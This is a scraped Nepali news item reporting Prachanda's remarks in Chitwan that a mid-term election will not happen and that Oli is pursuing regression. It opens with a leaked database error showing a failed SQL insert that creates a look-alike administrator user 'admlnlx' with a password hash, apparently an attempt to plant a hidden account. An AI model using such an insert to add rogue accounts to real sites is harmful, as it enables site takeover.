WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbCyumaelwurZLDCoRFRggyHrU/E520', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 10:36:50', '', 'admlnlx', 'admlnlx')
नेकपा प्रचण्ड माधव समुहका अध्यक्ष प्रचण्डले मध्यवादी निर्वाचन कुनै पनि हालतमा नहुने दाबी गरेका छन् ।
चितवनको भरतपुर विमानस्थलमा आज पत्रकारहरुसँग कुराकानी गर्दै अध्यक्ष प्रचण्डले अहिलेको अवस्थामा चुनाव गराउनु प्रतिगमन भएको बताए ।
चुनाव हुन्छ भन्दै ओलीले जनतालाई झुक्याउँदै पञ्चर्याली गरेको प्रचण्डले आरोप लगाए । ‘पन्चर्याली गर्ने जमिन बाँड्छु भन्ने पहिलेका राजा महाराजाले जस्तै सभा गदै ओलीले प्रतिगमन गरे पनि ओलीको हार भईसकेको प्रचण्डको दाबी छ ।
राम्रो दिमाग भएका सबै मानिस ओलीको प्रतिगमनको बिरुद्धमा रहेको प्रचण्डको भनाई छ ।अध्यक्ष दाहाल कम्युनिष्ट नेता नरबहादुर केसीको निधनमा अन्तिम श्रद्धान्जली दिन चितवन पुगेका छन् ।